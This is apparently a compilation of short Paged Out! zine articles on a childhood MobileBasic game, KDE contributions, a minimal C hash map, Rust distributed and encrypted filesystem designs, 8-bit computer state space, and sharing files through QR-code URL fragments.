Once in a while, my uncle would visit our little village from a distant capital. He happened to know a thing or two about computers, so I tormented him with all sorts of questions. "You can run different programs, but what is a program?", "What does it take to be a programmer?". I longed for a Lego replacement, and I knew that programming would give me that.

Some time later I was ill for a few days. Books and comics were read all the way through. You're in bed and can't go for a walk, no fun. I was scrolling through a mobile forum, and one topic caught my eye: "MobileBasic - a mobile programmator".

Hmm, there's some manual attached, let's have a look...

There are variables and IFs. There's a GOTO, so you can jump to other lines. You can load sprites, you can move sprites on the screen...

That's when it hit me. With these primitives, I can build games, imaginary planets, I can design worlds and rule them all... Wow!

On other phones, I saw this game where you start as a small fish and grow by eating other smaller fish. Let's implement that for starters.

Need to draw sprites, let's use mobile PaintCAD:

[Image: Graphics exported as .bmp, an array of pixels]

Write a bunch of lines right on the phone…

    520 GELLOAD "f4","f4.bmp":SPRITEGEL "f4","f4"
    522 X5%=-50:Y5%=110
    530 X%=65:Y%=65
    531 GELLOAD "f7","f7.bmp":SPRITEGEL "f7","f7"
    532 X7%=-20:Y7%=0
    537 XF1%=XF1%+1:YF1%=60+MOD(RND(0),60):SPRITEMOVE "f1",XF1%,YF1%
    538 SETCOLOR 0,250,0
    539 XF1%=XF1%+1:YF1%=60+MOD(RND(0),60):SPRITEMOVE "f1",XF1%,YF1%
    540 IF LEFT(0) THEN X%=X%-1
    541 XF%=XF%-1:SPRITEMOVE "f",XF%,YF%
    542 IF XF%<=0 THEN XF%=580+MOD(RND(0),50):YF%=60+MOD(RND(0),60):SPRITEMOVE "f",XF%,YF%

I suppose that f4 stands for "fish of size 4"

7 days in, the game was ready. ZIP it all together, rename to .jar... Time to share it with friends via IR port or WAP upload!

[Image: Friends from the neighborhood trying out the game]

Acquired skills allowed me to enroll at university a few years later and continue my journey into the mysterious world of programming. 🏗

Artem Zakirullin
https://twitter.com/zakirullin
https://github.com/zakirullin
SAA-ALL 0.0.7 35
Art New Inhabitants
Dmitry Petyakin
https://www.instagram.com/dmitrypetyakin/
https://www.artstation.com/el-metallico
SAA-NA 0.0.7 36
My journey in KDE and FOSS Programming

MY JOURNEY IN KDE AND FOSS

I have been working on KDE software as my day job for about a year now. However, I've been contributing to KDE software for around 3 years.

For those who don't know, KDE makes software for many platforms, but one of their biggest things is KDE Plasma, a desktop environment for Linux devices. You can see more here: https://kde.org/

When I moved to Linux as my daily driver roughly 3 years ago, I was quite impressed by how well things had been made. Over time I found some bugs that annoyed me and I began trying to fix them. I had zero knowledge about C++ or Qt, but I was so annoyed by a bug I was determined to fix it.

So I scoured through the documentation, asked questions, hacked on things to try to make them work and eventually managed to fix it. I was happy, but.. I craved more. Why not continue doing this?

I then worked as a hobbyist contributor on KDE software for a couple of years. My day job was test automation at the time, which was quite dull. I found working on KDE projects much more interesting and it helped me to keep going.

Sadly I got laid off from that job eventually. I was really frustrated, since I had to look for a new job now. I told my friends in KDE about it.

What I didn't expect was a job offer in return for my venting. So of course I took it!

Now, I want to emphasize that I am no code wizard who can get a job just like that, but I have a lot of passion and drive for KDE software and Linux in general, and I guess that showed.

I was lucky, of course, but I also have skills that I would have never gotten if I had never started contributing. Sure I could write code, but with open source, social skills are also really important, since you work with people all day, in the open. I keep working on all those skills every single day.

For anyone else interested in working at open source, I do not have any surefire ways to get there but it is possible.

IF YOU HAVE THE DRIVE FOR IT AND KEEP HONING YOUR SKILLS FOR IT, YOU MIGHT BE CLOSER THAN YOU THINK.

WHAT I'VE LEARNED IN WORKING AT OPEN SOURCE

I am no pro, I keep learning every day, but I wanted to share small snippets of things I've learned. Maybe you'll find them useful if you're interested in contributing to a project!

# YOU DON'T HAVE TO KNOW EVERYTHING BEFORE WORKING ON THINGS
When I started hacking on KDE software, I knew nothing about Qt, C++ or QML. I had programming experience, but mostly with Python from working on test automation related things. I also have worked on my own C projects as a hobby, but nothing big really.

So ask questions and write the answers down. Read the docs. Just hack on things! Figuring it out as you go is perfectly fine.

# EVERYTHING IS OUT IN THE OPEN
In the free and open source software world, everything is shared openly: from mailing lists to communication, from bug reports to source code and merge requests...

It's good to know that when making changes to things. If you don't know why some change was made, for example, remember that you can always scour back through the git logs, mails, etc.

# THINGS MAY GET HEATED
It's common, especially in more subjective matters, that some things will raise a lot of discussion. It can get quite heated too!

Do not let that heat burn you, but do not let it scare you away either. Believe in your vision, but allow it to change and mold.

# CRITIQUE IS GOOD
Getting your code/feature/idea/thing critiqued is a good thing. Don't be scared of it. In the end, everyone is there to make the project better and critique is a natural part of it. It's not aimed at you as a person, but at the thing you created.

And by critique, I mean respectful discussion. That is something to remember when you're the one giving the critique as well.

# YOU MAY ENCOUNTER NASTY PEOPLE
I have to put this here because it really is a thing. It's a sad, sad thing. But it's something you may have to face. So be prepared for it, but do not let it get you down.

For one naysayer, there are usually 9 others who like the changes you made.

# REMEMBER TO REST
Working on open source causes people to burn out very often, especially if one has to deal with rude people. It's good to just completely distance yourself from the project from time to time, and let your body and mind rest.

The project and the other contributors will wait for you to return. I do wish I took this advice more often myself!

Art by Tyson Tan. Under Creative Commons Attribution Share‐Alike

Akseli Lahtinen
Blog: https://www.akselmo.dev
CC BY-SA 4.0 Mastodon: https://scalie.zone/@aks 37
Programming On Hash maps and their shortest implementation possible

On Hash maps and their shortest implementation possible

About Hash maps. Explaining hash maps, their implementation and showing a very short but functioning implementation in C.

Hash maps are the backbone of fast running programs. They power caches, make searching really fast (for certain workloads faster than search trees), allow databases to create indexes for really fast lookups and are used to create sets.

Hashes and Hashing functions. A hash function always computes the same integer, called a hash, for the same input. This integer is then used to index into the underlying array of the map. If two differing inputs compute to the same hash, a hash collision occurs - this collision can be dealt with by storing a list of elements at the location the hash points to, thus allowing for more than one element for each hash [1]. Let’s take a look at a common hashing application: Java hashes strings by summing the characters of the string, each multiplied by a power of 31 that depends on its position [2].

    var s = "Hello World";
    int h = 0;
    for (int i = 0; i < s.length(); i++)
        h = 31 * h + s.charAt(i);

We will use a similar, but different algorithm for hashing our key strings: fnv-1a [3]. The key of fnv-1a is to start with a default value for the hash, called the base, modify it by xoring it with the current character and then multiplying it with a prime number. On that basis, we can create the first function of our naive implementation, hash(), to hash our string keys:

    const size_t BASE = 0x811c9dc5;
    const size_t PRIME = 0x01000193;
    size_t hash(Map *m, char *str) {
        size_t initial = BASE;
        while (*str) {
            initial ^= (unsigned char)*str++; // xor with the current character
            initial *= PRIME;                 // then multiply by the prime
        }
        return initial & (m->cap - 1);
    }

The first things to notice are the two constants required by fnv-1a, the Map parameter of the hash function and the bitwise AND in the return statement. The m parameter is used specifically in combination with the bitwise & to restrict the resulting hash to the size of the underlying array, thus eliminating out of bounds errors - this way of computing modulo is faster than initial % m->cap, but only works when cap is a power of two. We control the size of the map, thus we can keep this in mind.

Map Initialisation. The Map structure contains the capacity, the size and the array of buckets, each bucket containing void *. This type can also just be a value, such as a double. C, however, allows for erasing the type of a pointer by casting it: (void *)p. Therefore, this map can contain any pointer and does not assume ownership over the value itself - the downside is, the user has to cast the inserted and extracted pointers, while keeping track of their lifetimes.

    #include <assert.h> // assert
    #include <stdio.h>  // printf
    #include <stdlib.h> // calloc, free, EXIT_SUCCESS

    typedef struct Map {
        size_t size;
        size_t cap;
        void **buckets;
    } Map;

The Map is initialised with a size of 0, the defined cap and by allocating the buckets. We check for allocation failures with the assertion.

    Map init(size_t cap) {
        Map m = {0, cap};
        // calloc zeroes the buckets, so a missing key reads back as NULL
        m.buckets = calloc(m.cap, sizeof(void *));
        assert(m.buckets != NULL);
        return m;
    }

Pointer Insertion. Inserting a pointer into the map consists of incrementing the size field, computing the hash and assigning the pointer we want to insert to the element at that index:

    void put(Map *m, char *str, void *value) {
        m->size++;
        m->buckets[hash(m, str)] = value;
    }

Pointer Extraction. Extracting a pointer works the same way as the insertion: computing the hash and returning the value at the index:

    void *get(Map *m, char *str) {
        return m->buckets[hash(m, str)];
    }

Usage Example. The caller of the map functions can even insert pointers to stack variables, as long as those variables are still alive whenever the pointer is read back. The caller also has to free the allocated bucket array.

    int main(void) {
        Map m = init(1024);
        double d1 = 25.0;
        put(&m, "key", (void *)&d1);
        printf("key=%f\n", *(double *)get(&m, "key"));
        free(m.buckets);
        return EXIT_SUCCESS;
    }

[1] https://en.wikipedia.org/wiki/Hash_collision
[2] https://docs.oracle.com/javase/8/docs/api/java/lang/String.html
[3] https://en.wikipedia.org/wiki/Fowler-Noll-Vo_hash_function
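
The article mentions that collisions can be handled by storing a list of elements per bucket, but the naive C map simply overwrites whatever sits at the index. The following is a minimal sketch of that chaining idea, written in Python for brevity rather than in the article's C. The names `fnv1a_32` and `ChainedMap` are hypothetical, the hash is masked to 32 bits (an assumption, since the C code uses `size_t`), and the bucket index uses the same power-of-two masking trick described above.

```python
FNV_OFFSET_BASIS = 0x811C9DC5  # the article's BASE
FNV_PRIME = 0x01000193         # the article's PRIME


def fnv1a_32(key: bytes) -> int:
    """32-bit FNV-1a: xor in each byte, then multiply by the prime."""
    h = FNV_OFFSET_BASIS
    for byte in key:
        h ^= byte
        h = (h * FNV_PRIME) & 0xFFFFFFFF  # keep the hash at 32 bits
    return h


class ChainedMap:
    """Hypothetical map that keeps a list of (key, value) pairs per bucket."""

    def __init__(self, cap: int = 8):
        # The masking trick below only works for a power-of-two capacity.
        if cap <= 0 or cap & (cap - 1):
            raise ValueError("cap must be a power of two")
        self.cap = cap
        self.size = 0
        self.buckets = [[] for _ in range(cap)]

    def _index(self, key: str) -> int:
        return fnv1a_32(key.encode("utf-8")) & (self.cap - 1)

    def put(self, key: str, value) -> None:
        bucket = self.buckets[self._index(key)]
        for i, (existing, _) in enumerate(bucket):
            if existing == key:          # same key: replace, size unchanged
                bucket[i] = (key, value)
                return
        bucket.append((key, value))      # new key, possibly a collision
        self.size += 1

    def get(self, key: str, default=None):
        for existing, value in self.buckets[self._index(key)]:
            if existing == key:
                return value
        return default
```

Because each bucket stores the key next to the value, two keys that hash to the same index no longer clobber each other; the price is a short linear scan inside the bucket.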

xnacly
Blog: https://xnacly.me
38 Github: https://github.com/xnacly SAA-TIP 0.0.7
The Hitchhiker's Guide to Building a Distributed Filesystem in Rust. The beginning...
Programming

The Hitchhiker’s Guide to Building a Distributed Filesystem in Rust. The beginning...

It all started after I began learning Rust and picked up a learning project to keep me motivated. It was an encrypted filesystem, https://github.com/radumarias/rencfs. There I got the basics of writing a filesystem with FUSE, encryption, the WAL concept, data integrity, parallel processing, and filesystem internals.

The next challenge I picked was building a distributed filesystem. I was always fascinated by distributed filesystems, having used Hadoop (HDFS), Spark, Flink, Kafka. I became familiar with the concept of sharding using Elasticsearch, with cluster leaders and the election process using MongoDB, and with WAL from PostgreSQL. The next phase was collecting a lot of links to read about how to build it. After a period of research, I ended up understanding the basic concepts and selecting some frameworks to use. Finally, I ended up with the following structure and frameworks for the system. The repo for this project is https://github.com/radumarias/rfs

COORDINATOR NODES. These will be the entry points to the system for the client apps. They will be responsible for creating the structure, saving the metadata and creating the logical distribution of the shards (chunks from files). They will be served with gRPC using Apache Arrow Flight. They will run in a distributed Raft cluster or, if we don’t want the penalty of a single active master at a time, we can use something like CRDTs (Conflict-free replicated data types) with Redis Sets, ensuring constraints like uniqueness of file names inside a folder. For the actual sharding and distribution, a coordinator splits the file into shards of 64MB and, using Consistent hashing (used by MongoDB and Cassandra partially) or Shard keys (used by tikv and Cassandra partially), distributes the shards along with their replicas on multiple data nodes.

Quick explanation of how Consistent hashing works. We hash all node names or IPs and we create a ring with points in the interval 0 ... 2^64 - 1 from the hash values. We add v-nodes, which are virtual nodes built from node names with a sequence suffix, so that hashes are distributed more evenly. We’ll use BLAKE3 for hashing. Then we hash the file key, like the absolute path or some unique identifier. This gives a number on the ring, and we search for the closest node hash clockwise using binary search, O(log n), or linear search, O(n). That will be the node where the shard will be placed. We do this for all replicas too, which are hashed from the key plus a sequence suffix, removing already assigned nodes from the ring as we distribute the next replicas. Both sharding techniques work well when nodes are added (when we need more space) or removed (when they fail or we want to reduce costs). Consistent hashing redistributes the shards when the node configuration changes; Shard range splits existing ranges and assigns them to new nodes, and merges ranges with existing ones when nodes are removed.

The metadata will be saved in the tikv DB, and communication with data nodes will go through Kafka (each node will have its own topic) to avoid congestion and to get decoupling and retries. Coordinator nodes will keep a list of ongoing tasks for the data nodes and, in case a data node dies, will reallocate the operations, shards and tasks to other nodes.

DATA NODES. Once the structure and logical distribution are finished, the client communicates directly with data nodes to upload/download the shards. This will be done via HTTP with the Content-Range header at first, and via BitTorrent, SFTP, FTPS, gRPC with Apache Arrow Flight, or QUIC later on. After a shard is uploaded, we check the transferred data with BLAKE3, and we check it again after saving it to disk, to ensure data integrity. First, we write data to a WAL (Write-ahead log) and then, periodically or after all the files have been uploaded, we write the chunks to disk. This strategy is widely used by DBs to ensure integrity: if the process dies or we experience a power loss while writing, the next time we restart we continue writing until all changes are applied.

FILE SYNC. We will implement Mainline DHT, which will be an interface for DHT queries and will read the data from tikv. This eliminates the need for a tracker, which is a single point of failure; the DHT is a distributed hash table. Then we sync the file content via BitTorrent. This makes sense because we will have multiple replicas for each file, so a node can read from multiple peers. The plan is to implement the transport layer with QUIC and take advantage of zero-copy with sendfile(), which sends the data from disk directly to the socket without copying it through user-space buffers, saving CPU.

FILE CHANGES. After the file is synced, we will create a Merkle tree, and when the file is changed, we just compare the trees between the nodes, starting from the root, to determine exactly which parts and chunks of the file were changed, so we sync only those.

CAP THEOREM: We especially target Consistency and Availability when possible.

NODE FAILURES. No distributed system I have experienced is 100% fault free. We need to prepare the system for failure and adapt when nodes go down. There are different types of failures and strategies for handling them, but we will be prepared for these kinds of failures: Node, Network, Software, Partition, Byzantine, Crash, Performance. This is how we can make failure-tolerant systems: Redundancy, Replication, Graceful Degradation, Fault Isolation, Failure Detection.

Radu Marias
https://xorio.rs
Public Domain 39
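
The consistent hashing steps described in the article above (ring of hashed v-nodes, clockwise binary search, replicas hashed from the key plus a sequence suffix while skipping nodes that were already assigned) can be sketched roughly as follows. This is an illustration under stated assumptions, not the project's code: `ring_hash`, `HashRing`, the `#` suffix format and the default of 64 v-nodes are all hypothetical, and BLAKE2b from Python's standard library stands in for BLAKE3, which the standard library does not provide.

```python
import bisect
import hashlib


def ring_hash(value: str) -> int:
    """Map a string to a point in 0 .. 2**64 - 1.

    Assumption: BLAKE2b (stdlib) is used here in place of BLAKE3.
    """
    digest = hashlib.blake2b(value.encode("utf-8"), digest_size=8).digest()
    return int.from_bytes(digest, "big")


class HashRing:
    def __init__(self, nodes, vnodes: int = 64):
        points = []
        for node in nodes:
            # v-nodes: the node name plus a sequence suffix
            for i in range(vnodes):
                points.append((ring_hash(f"{node}#{i}"), node))
        points.sort()
        self._hashes = [h for h, _ in points]
        self._owners = [owner for _, owner in points]
        self._node_count = len(set(nodes))

    def nodes_for(self, key: str, replicas: int = 3):
        """Pick one distinct node per replica, searching clockwise."""
        chosen = []
        for r in range(min(replicas, self._node_count)):
            # Each replica is hashed from the key plus a sequence suffix.
            point = ring_hash(f"{key}#{r}")
            start = bisect.bisect_left(self._hashes, point)  # O(log n)
            for step in range(len(self._owners)):
                owner = self._owners[(start + step) % len(self._owners)]
                if owner not in chosen:  # skip already assigned nodes
                    chosen.append(owner)
                    break
        return chosen
```

A call such as `HashRing(["node-a", "node-b", "node-c"]).nodes_for("/data/file.bin:0")` returns up to three distinct node names. Removing a node that holds none of a shard's replicas leaves that shard's placement unchanged, which is the property that keeps redistribution small when the cluster changes.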
The Hitchhiker’s Guide to Building an Encrypted Filesystem in Rust Programming

The Hitchhiker’s Guide to Building an Encrypted Filesystem in Rust

BEGINNING: It all started after I began learning Rust and wanted an interesting learning project to keep me motivated. Initially, I had some ideas, then consulted ChatGPT, which suggested apps like a Todo list :) I pushed it to more interesting and challenging realms, leading to suggestions like a distributed filesystem, password manager, proxy, network traffic monitor... Now, these all sound interesting, but maybe some are a bit too complicated for a learning project, like the distributed filesystem.

IDEA: My project idea originated from having a working directory with project information, including some private data (not credentials, which I keep in Proton Pass). I synced this directory with Resilio across multiple devices and considered using Google Drive or Dropbox, but hey, there is private info in there, so it is not ideal for them to have access to it. So a solution like encrypted directories, keeping the privacy, was appealing. So I decided to build one. I thought to myself this would be a great learning experience after all. And it was indeed.

From a learning project, it evolved into something more, which will soon be released as a stable version with many interesting features. You can view the project at https://github.com/radumarias/rencfs.

FUSE: I had used it before, and I could use it to expose the filesystem to the OS to access it from the File Manager and terminal. I looked for FUSE implementations in Rust and found fuser, and later migrated to fuse3, which is async. I began with its examples.

IN-MEMORY-FS: I started with a simple in-memory FS using FUSE, where I learned more about smart pointers like Box, Rc, RefCell, Arc and lifetimes. Aargh... lifetimes, many would say, one of the most complicated concepts in Rust, after the Borrow-Checker. They are quite complicated at first, but after you fight them for a while, you bury the hatchet, and then they are easier to live with. After you understand how and why the compiler lets you do things, you understand that’s the correct way to do it, and it saves you from many problems, and you appreciate it. After all, these are the promises of Rust: memory safety, no data races, and fewer race conditions. And indeed, it lives up to its promise. You need to come from other languages where you had all sorts of problems to really appreciate what Rust is offering you.

STRUCTURE: I started with a simple one that keeps the files in an inode structure: each file's metadata is stored in the inodes dir in a file named after the inode, and in the contents directory we have files named after the inode with the actual content of the file.

MULTI-NODE: We must run in multi-node, as the folder will be synced over several devices. The app could run in parallel or even offline. We must generate unique inodes for new files. The solution is to assign an instance_id as a random id to each device (or to set it by command arg, which is safer) and generate inodes as instance_id | inode_seq, where inode_seq is a sequence/counter for each device.

SECURITY: We do the same for the nonce, instance_id | nonce_seq. We keep the sequences in data_dir in a per-instance folder. To resolve the problem where a user restores a backup and hence would reuse nonces and inodes (which ends up in catastrophic failure), we keep the sequences in the keyring too and use max(keyring, data_dir).

Limits: if the instance_id is u8, the max inode (u64) is reduced to 2^56 - 3. It’s -3 and not -1 because inode 0 is not used, and 1 is reserved for the root dir, so we’re left with the value 72,057,594,037,927,933. And the max data to encrypt is (3.09485009821345068724781055 * 10^26 - 1) * 256 KB, which is 7.92281625142643375935439 * 10^13 petabytes.

Using ring for encryption; this will extend to RustCrypto too, which is pure Rust. The first time, we generate a random encryption key and encrypt that with another key derived from the user’s password using argon2. We use only AEAD ciphers, ChaCha20Poly1305 and Aes256Gcm. Credentials are kept in memory with secrecy, mlocked when used, mprotected when not read and zeroized on drop. Hashing is done with blake3, and rand_chacha is used for random numbers.

DATA-PRIVACY: We aim to offer true privacy and for that we need to make sure we hide all metadata, content, file name, file size, *time fields, file count, directory structure and that all of these are encrypted. Filename and content are easier to hide; we just encrypt them and pad filenames to a fixed size, and we’re fine. But file size, file count, *time fields, and directory structure are not trivial. For that, we split the file into chunks, and each is like an item in a LinkedList on disk, with the next pointer kept encrypted inside the chunk file content. This hides the actual file count, but we add dummy nodes at the beginning with random data to hide it even more. Also, we add dummy random data to each chunk at the beginning (as it’s easier to skip), so we hide the file size even more. All these hide file sizes, file count, and *time fields. This creates a problem: how do we get to the root chunk files (nodes) without an attacker being able to do the same, given our code is publicly available on GitHub? For that, we keep an index file with all root chunk files (inodes, actually). What’s remaining is the directory structure, in the sense of the directories inside another directory. For this, we do something similar: we create dummy folders with random names so we hide how many actual directories are there, and we keep all these in the index file.

FILE-INTEGRITY: "There’s The Great Wall, and then there’s this: an okay WAL." WAL (Write-ahead logging) is a very common technique used in the DB world for writing transactions to ensure file integrity. I’m using okaywal.

SEEK: To support fast seeks, we encrypt the file in blocks of 256KB. When we need to seek on read, we translate from the plaintext offset to the ciphertext block_index, and decrypt that block. We actually impl Seek on the same Read struct. For seek on write it’s a bit more complicated, as we need to act as a reader too. First, we need to decrypt the block, then write to it, and when at the end of the block, encrypt the block and write it to disk. Because Rust doesn’t have method overriding, the code is not as clean as for the reader, where we only extend.

WRITES-IN-PARALLEL: Using RwLock we allow reading and writing in parallel and we resolve conflicts with WAL. It is particularly useful for torrent apps that write different chunks in parallel, but also for DBs.

STACK: See more at https://github.com/radumarias/rencfs?tab=readme-ov-file#stack.

Radu Marias
https://xorio.rs
Public Domain 41
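
Two pieces of arithmetic from the article above lend themselves to a short sketch: composing a unique inode from `instance_id | inode_seq`, and translating a plaintext offset into a block index for seeking. The Python below is only an illustration (the project itself is written in Rust). The bit layout, with the u8 instance id in the top byte and the counter in the low 56 bits, is an assumption, as are the helper names `make_inode`, `next_sequence` and `locate_block`.

```python
INSTANCE_BITS = 8               # instance_id is a u8, as in the article
SEQ_BITS = 64 - INSTANCE_BITS   # 56 bits remain for the per-device counter
BLOCK_SIZE = 256 * 1024         # the file is encrypted in 256KB blocks

# Largest usable count: 2**56 values, minus inode 0 (unused), inode 1
# (root dir) and one more as stated in the article.
MAX_INODES = (1 << SEQ_BITS) - 3


def make_inode(instance_id: int, inode_seq: int) -> int:
    """Assumed layout: instance id in the top byte, counter below it."""
    if not 0 <= instance_id < (1 << INSTANCE_BITS):
        raise ValueError("instance_id must fit in a u8")
    if not 0 <= inode_seq < (1 << SEQ_BITS):
        raise ValueError("inode_seq must fit in 56 bits")
    return (instance_id << SEQ_BITS) | inode_seq


def next_sequence(keyring_seq: int, data_dir_seq: int) -> int:
    """After a restored backup, continue from the larger stored counter."""
    return max(keyring_seq, data_dir_seq) + 1


def locate_block(plaintext_offset: int):
    """Return (block_index, offset_inside_block) for a plaintext offset."""
    return divmod(plaintext_offset, BLOCK_SIZE)
```

With this layout two devices can hand out the same counter value without colliding, because their inodes differ in the top byte. Where a block starts in the ciphertext file depends on the per-block nonce and tag overhead, which the article does not spell out, so that step is left out here.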
Art Problematic communication

aliquid
X/Twitter: @_aaliquid
42 ArtStation: https://artstation.com/aliquid SAA-TIP 0.0.7
Understanding State Space with a Simple 8-bit Computer Programming

Understanding State Space with a Simple 8-bit Computer

State space is an important concept in computer science as it allows us to determine key fundamental limits of a computational model. In binary computers, each component of the computer can be represented by one or more binary digits or bits. The set of these components at any moment, represented by these bits, is the computer’s state. This state can change billions of times per second as the computer executes code. State space is the collection of all states the computer could ever be in [1]. You may think that a computer could represent an infinite number of states, but it is actually finite for any computer we could build, though the state space is very large as we will see.

I have created a simple 8-bit computer, built within Logisim (http://www.cburch.com/logisim/) to illustrate. This simple 8-bit computer allows us to better understand how computers function at the lowest level. I have included the Logisim file and a Python emulator of this simple 8-bit computer at: https://github.com/meuer26/Simple-8-bit-Computer .

Figure 1: A Simple 8-Bit Computer

This computer is a Von Neumann architecture and a RISC machine. This computer’s Instruction Set Architecture (ISA) only has 10 implemented opcodes and yet it possesses the primary characteristics for Turing Completeness: (1) the ability to read and modify memory, (2) the ability to branch for program control (including conditional branching), and (3) the ability to do arithmetic operations [2]. It is, therefore, capable of universal computation, or has the ability to implement any computable function (assuming enough memory). This assumption of enough memory is a major distinction and key to our understanding of state space. This simple 8-bit computer only has 256 bytes of memory, so you may think that the number of programs that can be implemented is extremely small. You may be surprised by the answer.

Let’s start by computing the size of the computer’s state space. To simplify the discussion, let’s only consider the computer’s RAM. There are 256 bytes of memory and each byte has 256 bit permutations, so the state space of this computer is 256^256 or 3.23*10^616 states. This is an amazingly large number of states. For comparison, it is estimated that there are only 10^80 atoms in the universe [3].

While state space gives us the upper bound of the number of bit permutations RAM could be in, the computer’s ISA severely restricts the number of valid programs that can be executed. I define valid programs as those constructed from implemented opcodes. Any opcode values not implemented are considered invalid. In order to calculate the upper bound of the number of valid programs that can be created with this computer, we need to understand a bit more about this computer’s ISA. As mentioned, there are only 10 implemented opcodes. 8 of the opcodes require an operand byte that could have 256 bit permutations. So, 8*2^8 + 2 opcodes that don’t need an operand = 2,050 valid instructions in the ISA. (We will ignore the fact that the two remaining opcodes do actually require an explicit, padded operand in this fixed-length ISA.) So, the upper bound of the number of valid programs is 2050^128, since we can fit 128 two-byte instructions in the 256 bytes of RAM. This is 8.0*10^423 valid programs.

Again, an amazingly large number of valid programs for this simple 8-bit computer with 256 bytes of RAM. Very large but finite. The state space of this computer is 3.23*10^616 and the number of valid programs is 8.0*10^423. So, we can think of the ISA as a lower-dimensional structure in the higher-dimensional state space of the computer. It is also now clear that the memory of the computer is what determines the state space, while the ISA dictates what a valid program could be. The number of valid programs must necessarily be less than or equal to the size of the state space of the computer. If this computer had a hard drive, the state space would need to be computed based on the size of the hard drive (since RAM could be swapped to the hard drive in that scenario). I’ll leave it to the reader to compute the state space of their modern computer and the number of possibly valid programs based on their ISA.

References

[1] C. Moore and S. Mertens, The nature of computation. OUP Oxford, 2011.
[2] P. A. Laplante, “A novel single instruction computer architecture,” ACM SIGARCH Computer Architecture News, vol. 18, no. 4, pp. 22–26, 1990.
[3] E. Babb, “Calculating the amount of dark energy in the universe using a novel space energy theory of gravity,” Academia, (Just use Google).

Daniel O'Malley
X/Twitter: @binarywonder
SAA-TIP 0.0.7 43
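
The two counts in the article above are easy to check with exact integer arithmetic. The short Python sketch below recomputes them from the figures given in the text (256 bytes of RAM, 8 opcodes with a one-byte operand, 2 without, two-byte instructions). The helper `sci` and the constant names are hypothetical, and `sci` truncates the mantissa instead of rounding it.

```python
RAM_BYTES = 256
STATES_PER_BYTE = 2 ** 8            # 256 bit patterns per byte

OPCODES_WITH_OPERAND = 8
OPCODES_WITHOUT_OPERAND = 2
INSTRUCTION_BYTES = 2               # fixed-length, two-byte instructions

state_space = STATES_PER_BYTE ** RAM_BYTES

valid_instructions = OPCODES_WITH_OPERAND * 2 ** 8 + OPCODES_WITHOUT_OPERAND
instruction_slots = RAM_BYTES // INSTRUCTION_BYTES
valid_programs = valid_instructions ** instruction_slots


def sci(n: int, digits: int = 3) -> str:
    """Format a positive integer as d.dd*10^e (mantissa truncated)."""
    s = str(n)
    return f"{s[0]}.{s[1:digits]}*10^{len(s) - 1}"


if __name__ == "__main__":
    print("state space:   ", sci(state_space))
    print("instructions:  ", valid_instructions)
    print("valid programs:", sci(valid_programs))
```

Python integers have arbitrary precision, so both powers are computed exactly and only the printed form is shortened.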
Programming Using QR codes to share files directly between devices

Suppose you have a file / some data you’d like to share that cannot or should not
live on any machines other than the ones it is to be shared between. Perhaps:
● the data is sensitive
● the host has no network access
● there’s no computer at all! It’s just raw digital data IRL

There are plenty of options for transferring data, but in 2024, few are more
practical than QR codes. They are trivial to generate and display (hand draw one in the
dirt if you want!) and it is reported that a majority of Earth’s human inhabitants now
own a smartphone. I can’t confirm that all of those have QR scanners baked in, but
hopefully you’ll allow me to assume that most of them do. Point being: QR codes are cheap
and ubiquitous. They’re also content-agnostic, which is great! You can encode any chunk
of binary data as long as it fits within the 2,953 byte limit.

However, we hit a snag when we consider the “no internet” constraints defined above:
The default QR scanner apps on both iOS and Android desperately want to hand you off to
your web browser and pretty much force you to send your data to a third party before
letting you access it. In the best case, you’ve scanned an HTTP/S URL and a website loads
or you’re deep-linked into a pre-installed app. In most other cases, you are prompted to
perform a web search with the contents of the QR code. iOS won’t even let you do that in
some cases - you cannot view/interact with a scanned data URL, for example. To work
around this, and to prevent potential file recipients from having to manually install a
custom scanner application, I’ve created a simple web app that parses the URL it was
accessed from as a base64-encoded file, and then hands the decoded version of that file
back to the accessor as a standard browser download:

<!DOCTYPE html>
<html>
<body>
<script>
function downloadBase64File(base64Data, filename) {
  const ascii = atob(base64Data);
  const bytes = new Array(ascii.length);
  for (let i = 0; i < ascii.length; i++) {
    bytes[i] = ascii.charCodeAt(i);
  }
  const byteArray = new Uint8Array(bytes);
  const blob = new Blob(
    [byteArray],
    { type: "application/octet-stream"}
  );
  const link = document.createElement("a");
  link.href = URL.createObjectURL(blob);
  link.download = filename;
  // :P simulate a click to trigger download
  document.body.appendChild(link);
  link.click();
  document.body.removeChild(link);
}
const params = new URLSearchParams(window.location.search);
// use fragment so data not sent to server
// idea: @[email protected]
const data = window.location.hash.substring(1);
// the filename used for the download should be
// passed in as a query param: 'f'
const filename = params.get("f");
downloadBase64File(decodeURIComponent(data), filename);
</script>
</body>
</html>

The QR code above contains a miniature PNG version of the Paged Out! logo. The data backing this version of the image only exists as the black and white squares rendered in this PDF - it is not hosted on any other server (until you scan and download it, if you’re feeling brave). Note that scanning will direct your browser to the web app (currently hosted via Github Pages) but the image data itself should never leave your phone.

Some important notes:


1. You can host the code above statically as an HTML document on any web server you
have access to, and share a file by compiling a URL with the format:

https://{location of html file}?f={filename when downloaded}#{base64-encoded file data}

Once you have this URL, use your favorite QR code generator to QRify it.
2. The key here is that the file data is located in the URL fragment (the bit following
the ‘#’). URL fragments are (theoretically) only used by browsers and should not be
sent out with a network request. I encourage you to verify this yourself!
3. Yes, the device scanning your code will need internet access, but only to retrieve
the HTML file above. Again, we’re operating under the assumption that most people
are out in the world, scanning with their smartphones.
4. It was inspired by ‘Itty Bitty’: https://itty.bitty.site
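
The URL format from note 1 can be assembled with a few lines of Python before handing the result to a QR generator. This is a rough sketch rather than the author's tooling: `build_share_url` and `read_share_url` are hypothetical names, `https://example.com/qr.html` is a placeholder for wherever the HTML file is hosted, and the size check simply applies the 2,953-byte limit mentioned earlier to the whole URL.

```python
import base64
from urllib.parse import parse_qs, quote, unquote, urlsplit

QR_MAX_BYTES = 2953  # largest binary payload of a single QR code


def build_share_url(page_url: str, filename: str, data: bytes) -> str:
    """Build {page}?f={filename}#{base64 data} for the web app."""
    b64 = base64.b64encode(data).decode("ascii")
    # Percent-encode '+', '/' and '=' so decodeURIComponent() restores them.
    url = f"{page_url}?f={quote(filename, safe='')}#{quote(b64, safe='')}"
    if len(url.encode("utf-8")) > QR_MAX_BYTES:
        raise ValueError("URL does not fit into a single QR code")
    return url


def read_share_url(url: str):
    """Mirror what the page does: filename from ?f=, data from the fragment."""
    parts = urlsplit(url)
    filename = parse_qs(parts.query)["f"][0]
    return filename, base64.b64decode(unquote(parts.fragment))


if __name__ == "__main__":
    # The host below is a placeholder, not the author's deployment.
    print(build_share_url("https://example.com/qr.html", "hello.txt", b"hi!"))
```

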